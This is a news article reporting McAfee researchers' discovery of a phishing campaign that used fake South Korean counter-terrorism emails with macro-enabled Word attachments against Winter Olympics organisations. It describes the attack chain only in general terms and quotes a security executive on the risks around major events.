In what comes as no surprise to cyber security experts, researchers have unearthed a stealthy campaign by hackers to target and compromise several organisations associated with the Winter Olympics which will be hosted by South Korea in February.
E-mails sent to organisations involved with the upcoming Winter Olympics contained malicious attachments masquerading as reports from the National Counter-Terrorism Center (NCTC) in South Korea.
The latest phishing campaign was unearthed by researchers at McAfee who spotted it first on December 22. They also observed repeated attempts by hackers in the next few days but did not name any particular hacker group as responsible for the operation.
‘The attackers originally embedded an implant into the malicious document as a hypertext application (HTA) file, and then quickly moved to hide it in an image on a remote server and used obfuscated Visual Basic macros to launch the decoder script. They also wrote custom PowerShell code to decode the hidden image and reveal the implant,’ said the researchers while describing the phishing campaign.
The phishing campaign began with the hackers sending e-mails directly to firstname.lastname@example.org and including a number of other South Korean organisations in the bcc field, thereby maximising the reach of their campaign.
At the same time, they made the e-mails appear as if they were sent by the National Counter-Terrorism Center (NCTC) in South Korea which is responsible for conducting physical security checks, thereby ensuring that virtually all recipients would download the attachments.
While the e-mails initially appeared to be genuine, upon further scrutiny, the researchers discovered that the e-mails were sent from an IP address located in Singapore using a Postfix email server. The attachments in the phishing e-mails contained prompts, asking users to enable content to read the documents in their version of Word.
Once enabled, the document launches a PowerShell script which then downloads an image file from a remote server. This way, the server exploits the encrypted channel to execute commands on the victim’s machine and to install additional malware.
‘The attacker’s objective is to make analysis difficult and to evade detection technologies that rely on pattern matching. Because the obfuscation makes use of native functions in PowerShell, the script can run in an obfuscated state and work correctly,’ the researchers added.
This isn’t the first time that hackers have targeted major sporting events or sports personalities. Last year, the infamous hacker group Fancy Bears hacked into World Anti-Doping Agency’s servers and released documents that contained details of hundreds of athletes who failed dope tests in 2015 and 2016.
In September, the FA also released an alert stating that Russian hackers were planning to target England footballers and other staff prior to and during the Football World Cup in Russia to be held later this year.
‘Global gatherings such as the Olympics that see world leaders, businesses and governmental organisations converge on one location are a naturally attractive target for digital criminal activity. Notably, it is becoming increasingly likely that multiple attempts will be made to obtain sensitive information like passwords.
Even when the stakes are high in situations like this, the international community must ensure that the necessary measures are in place and sufficiently fortified to prevent any data from falling into the wrong hands,’ says Peter Carlisle, VP for EMEA at Thales eSecurity.